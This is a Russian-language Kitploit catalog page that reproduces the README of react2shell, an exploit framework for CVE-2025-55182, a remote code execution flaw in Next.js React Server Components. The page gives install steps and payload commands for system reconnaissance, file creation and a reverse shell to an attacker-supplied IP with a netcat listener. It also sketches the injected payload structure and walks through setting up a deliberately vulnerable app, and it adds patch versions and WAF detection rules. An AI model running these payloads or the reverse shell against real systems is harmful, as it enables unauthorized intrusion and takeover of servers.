Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
react2shell — Полный фреймворк для эксплуатации уязвимости CVE-2025-55182 | Kitploit
Инструменты/GitHubGitHub/zr0n/react2shell
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubzr0n/react2shell

react2shell

Полный фреймворк для эксплуатации уязвимости CVE-2025-55182

Репозиторий
10579 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

React2Shell - Эксплойт PoC для CVE-2025-55182

Security Platform License

Доказательство концепции эксплойта для CVE-2025-55182 — критической уязвимости удалённого выполнения кода в приложениях Next.js, использующих React Server Components.

⚠️ ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ

ЭТОТ ИНСТРУМЕНТ ПРЕДНАЗНАЧЕН ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНОГО И АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ.

  • ❌ НЕ используйте против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения
  • ❌ Несанкционированный доступ к компьютерным системам противозаконен
  • ✅ Используйте только в контролируемых средах для обучения и авторизованного тестирования на проникновение
  • ✅ Автор не несёт ответственности за неправомерное использование или ущерб, причинённый этим инструментом

📋 Сведения об уязвимости

  • Идентификатор CVE: CVE-2025-55182
  • Уязвимость: Удалённое выполнение кода в React Server Components
  • Затронутые версии:
    • Next.js: ≥14.3.0-canary.77, все версии 15.x и 16.x с App Router
  • React: 19.0, 19.1.0, 19.1.1, 19.2.0
  • Исправленные версии:
    • Next.js: 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9, 15.0.5
    • React: 19.0.1, 19.1.2, 19.2.1
  • Оценка CVSS: Критическая
  • Вектор атаки: Сетевой, требуется специально сформированный POST-запрос
  • 🎯 Возможности

    • ✅ Кроссплатформенная поддержка (Windows и Linux)
    • ✅ Несколько типов полезных нагрузок
    • ✅ Возможности обратной оболочки (reverse shell)
    • ✅ Визуальные доказательные нагрузки (calc, notepad)
    • ✅ Операции с файловой системой
    • ✅ Сбор информации о системе

    🔧 Установка

    root@kitploit:~
    # Clone or download this repository
    git clone https://github.com/zr0n/react2shell
    cd react2shell
    
    # Install dependencies
    npm install form-data
    

    💻 Использование

    Базовый синтаксис

    root@kitploit:~
    node react2shell.js <target_url> <payload_type> [options]
    

    Доступные полезные нагрузки

    PayloadDescriptionExample
    basicМатематическое подтверждение концепции (7*7+1=50)node react2shell.js http://target:3000 basic
    whoamiПоказать текущего пользователя системыnode react2shell.js http://target:3000 whoami
    dirВывести содержимое текущего каталогаnode react2shell.js http://target:3000 dir
    systeminfoПоказать информацию об операционной системеnode react2shell.js http://target:3000 systeminfo
    fileСоздать доказательный файл EXPLOITED.txtnode react2shell.js http://target:3000 file
    calcЗапустить калькулятор (визуальное доказательство для Windows)node react2shell.js http://target:3000 calc
    notepadЗапустить блокнот (визуальное доказательство для Windows)node react2shell.js http://target:3000 notepad
    shellОбратная оболочка (автоопределение Windows/Linux)node react2shell.js http://target:3000 shell 10.10.10.5 4444

    Примеры

    1. Базовое подтверждение концепции

    root@kitploit:~
    node react2shell.js http://localhost:3000 basic
    # Check server console for output: EXPLOITED: 50
    

    2. Разведка системы

    root@kitploit:~
    # Get current user
    node react2shell.js http://localhost:3000 whoami
    
    # List files
    node react2shell.js http://localhost:3000 dir
    
    # System information
    node react2shell.js http://localhost:3000 systeminfo
    

    3. Визуальное доказательство (Windows)

    root@kitploit:~
    # Launch calculator
    node react2shell.js http://localhost:3000 calc
    
    # Launch notepad
    node react2shell.js http://localhost:3000 notepad
    

    4. Доказательство создания файла

    root@kitploit:~
    node react2shell.js http://localhost:3000 file
    # Check server directory for EXPLOITED.txt
    

    5. Обратная оболочка

    root@kitploit:~
    # Terminal 1: Start listener
    nc -lvnp 4444
    
    # Terminal 2: Execute exploit
    node react2shell.js http://localhost:3000 shell <YOUR_IP> 4444
    
    # Works on both Windows (PowerShell) and Linux (Bash)
    

    🏗️ Настройка уязвимой среды

    Предварительные требования

    • Node.js 18+
    • npm или yarn

    Создание уязвимого приложения Next.js

    root@kitploit:~
    # Create project directory
    mkdir vulnerable-nextjs-app
    cd vulnerable-nextjs-app
    
    # Initialize Next.js with vulnerable version
    npx create-next-app@latest . --ts --app --no-eslint --tailwind
    
    # Downgrade to vulnerable version
    npm install [email protected]
    
    # Install dependencies
    npm install
    

    Минимальное уязвимое приложение (app/page.tsx)

    root@kitploit:~
    export default function Home() {
      return (
        <div className="p-8">
          <h1 className="text-4xl font-bold">Vulnerable Next.js App</h1>
          <p className="mt-4">This app is vulnerable to CVE-2025-55182</p>
        </div>
      );
    }
    

    Запуск сервера

    root@kitploit:~
    npm run dev
    # Server runs on http://localhost:3000
    

    🔍 Как это работает

    Эксплойт использует уязвимость десериализации в React Server Components:

    1. Построение полезной нагрузки: Создаёт вредоносный сериализованный объект с загрязнением прототипа (prototype pollution)
    2. Доступ к конструктору функций: Использует constructor.constructor для доступа к конструктору Function
    3. Внедрение кода: Внедряет произвольный JavaScript-код через поле _prefix
    4. Выполнение: Сервер десериализует полезную нагрузку и выполняет внедрённый код

    Технические детали

    root@kitploit:~
    // Simplified vulnerability chain
    {
      _formData: {
        get: '$3:constructor:constructor' // Access Function constructor
      },
      _prefix: 'YOUR_CODE_HERE//' // Injected code
    }
    

    🛡️ Меры защиты

    Для владельцев приложений

    1. Немедленно обновитесь:

      root@kitploit:~
      npm update next@latest
      npm update react@latest react-dom@latest
      
    2. Проверьте исправленные версии:

      root@kitploit:~
      npm list next react
      
    3. Требуемые версии:

      • Next.js: ≥16.0.7 или ≥15.5.7
      • React: ≥19.2.1 или ≥19.1.2

    Для команд безопасности

    • Сканируйте свою инфраструктуру на наличие уязвимых версий Next.js
    • Внедрите правила Web Application Firewall (WAF) для обнаружения вредоносных RSC-нагрузок
    • Отслеживайте подозрительные POST-запросы с заголовком next-action
    • Проверяйте серверные журналы на предмет неожиданных шаблонов выполнения кода

    📊 Обнаружение

    Правила WAF

    Ищите POST-запросы с:

    • Заголовок: next-action
    • Content-Type: multipart/form-data
    • Тело, содержащее: constructor, _prefix, _formData

    Шаблоны в журналах

    root@kitploit:~
    POST / with next-action header
    Suspicious FormData keys: 0, 1, 2, 3, 4
    Response: 200 (successful exploitation) or 500 (failed)
    

    📚 Ссылки

    • CVE-2025-55182 - NVD
    • Консультации по безопасности Next.js
    • Обновления безопасности React
    • Внедрение кода OWASP

    🤝 Участие в разработке

    Это образовательный инструмент. Приветствуется вклад, улучшающий:

    • Возможности обнаружения
    • Документацию
    • Стратегии защиты
    • Образовательный контент

    НЕ отправляйте материалы, усиливающие возможности атак.

    📜 Лицензия

    Только для образовательного использования — гарантии не предоставляются

    👤 Автор

    Luiz Fernando Ziron Создано в образовательных целях и для повышения осведомлённости в области кибербезопасности.

    ⚖️ Юридическое уведомление

    Используя этот инструмент, вы соглашаетесь:

    • Использовать его только на системах, которыми вы владеете или на тестирование которых у вас есть явное письменное разрешение
    • Нести полную ответственность за свои действия
    • Не привлекать автора к ответственности за любое неправомерное использование или ущерб
    • Соблюдать все применимые законы и нормативные акты

    Несанкционированный доступ к компьютерным системам является преступлением в большинстве юрисдикций.


    Оставайтесь в безопасности, действуйте этично и законно. 🔒

    Скачать инструмент